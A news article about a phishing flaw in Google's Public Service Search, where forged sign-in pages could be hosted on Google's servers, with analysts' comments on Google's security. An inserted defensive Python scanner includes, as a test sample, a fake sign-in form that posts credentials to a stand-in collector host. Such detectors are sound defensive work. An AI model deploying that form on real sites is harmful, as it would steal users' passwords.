Google has come up with a temporary fix that prevents attackers from exploiting a newly discovered vulnerability in its Public Service Search. The potential exploit lets an attacker place a fake Google sign-in page on Google's actual servers.
Cory Altheide, security manager for Google, said in Google's Webmaster Central blog on Friday that Google has temporarily disabled logins on the service and is working on a permanent fix. So Public Service Search, which is aimed at universities and nonprofits, is for now closed to new signups.
But the glitch is just the latest in a series of security problems that have plagued the search engine firm of late. In the past few months, Google has been the victim of phishing scams on Gmail, toolbar problems, and a trojan that offered Google "updates" but instead made its victims bots. (See Google Toolbar Bug Warns Against Changing Search Engine Default and New Trojan Offers Google Update.) Google's search engine, too, has been abused by would-be attackers searching for vulnerabilities to exploit.
This latest phishing vulnerability, meanwhile, is bolder than most phishing scams because an attacker can place his fake page on the actual Google service and steal usernames and passwords for real Google services. Google's Altheide says in the blog the company knows of no exploits of the vulnerability thus far, "and this service represents an extremely small portion of searches."
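The risk described above comes from a hosted service rendering user-supplied page content on the same origin as a real sign-in page, so a forged login form inherits the trust of the domain it sits on. The following is an added example, not code from the article or from Google: a small defensive scanner that a hosted-content service could run over submitted page templates to reject any that contain a credential-capturing form. The trusted hostname, the HTML samples and the function names are all constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class CredentialFormScanner(HTMLParser):
    """Walks an HTML template and records every <form>, noting whether it
    contains a password field and where its action points."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "has_password": False}
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["has_password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self._current is not None:
            self.forms.append(self._current)
            self._current = None

    def close(self):
        super().close()
        # A form left unclosed at end of input still counts.
        if self._current is not None:
            self.forms.append(self._current)
            self._current = None


def find_credential_forms(html, trusted_host):
    """Return one finding per form that asks for a password. A hosted search
    template should never contain such a form at all; the off_origin flag
    additionally records whether the form posts somewhere other than the
    trusted host, which is the classic credential-harvesting shape."""
    scanner = CredentialFormScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for form in scanner.forms:
        if not form["has_password"]:
            continue
        action_host = urlparse(form["action"]).hostname
        off_origin = action_host is not None and action_host.lower() != trusted_host.lower()
        findings.append({"action": form["action"], "off_origin": off_origin})
    return findings


def template_is_acceptable(html, trusted_host):
    """Policy helper: reject any submitted template containing a password form."""
    return not find_credential_forms(html, trusted_host)


# Constructed samples (hypothetical hostname "search.example" stands in for
# the real service's domain).
TRUSTED_HOST = "search.example"

BENIGN_TEMPLATE = """
<html><body>
  <h1>Campus Library Search</h1>
  <form action="/search" method="get">
    <input type="text" name="q">
    <input type="submit" value="Search">
  </form>
</body></html>
"""

FAKE_SIGNIN_TEMPLATE = """
<html><body>
  <h1>Sign in to continue</h1>
  <form action="http://collector.example/grab" method="post">
    <input type="text" name="user">
    <input type="password" name="pass">
    <input type="submit" value="Sign in">
  </form>
</body></html>
"""

if __name__ == "__main__":
    print("benign accepted:", template_is_acceptable(BENIGN_TEMPLATE, TRUSTED_HOST))
    print("fake sign-in findings:", find_credential_forms(FAKE_SIGNIN_TEMPLATE, TRUSTED_HOST))
```

The check is deliberately conservative: it flags a password field even when the form posts back to the trusted host, because a hosted third-party template has no legitimate reason to collect credentials for the platform, and an attacker could just as easily harvest them with script rather than a foreign form action.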
So what's causing this wave of security woes at Google? Much of the problem lies in Google's open API model, analysts say. While Google's APIs have helped spread the search engine's popularity, they also leave it open to security weaknesses. "Whenever you have developers being able to create their own search APIs and maps, they can do wacky things," says Charlene Li, an analyst with Forrester Research. "They are a big fat target out there... The APIs make them even more potentially vulnerable."
Richard Stiennon, president of IT-Harvest, agrees. Attackers are making use of Google's APIs too, he says, as well as using Google to search for potential software vulnerabilities they can exploit. "There's a well-known technique right now where you can search on a security PHP script," for instance.
Google has traditionally had a clean security record, mostly because it mainly provided search capabilities. Now the company is offering client-side, custom search, and email apps, which open it up to security holes: "They had very good security because they were giving you this tiny window into their server pile, and it was extremely well-protected," says Gary McGraw, CTO for Cigital. "The more stuff they stick out there on clients, the more they are going to suffer from this kind of attack."
And that means Google will have to make some big-time changes to its security operations and approach, analysts say.
"As a big application provider, Google should be vigilant when launching new capabilities," Stiennon says.
Google's woes are similar to those of Microsoft in its early days. "Google's concentration is time-to-market, much like Microsoft's was a generation ago," says David Aitel, president of Immunity.
"I think we'll probably see a corresponding security curve at Google, starting with 'What is security?' to 'We should sue these guys' to 'We should hire these guys.' Right now we're in the 'What is security' phase," Aitel says. "Progress along this curve will probably be driven by Google's need to sell into the enterprise market, much like Microsoft's was."
Kelly Jackson Higgins, Senior Editor, Dark Reading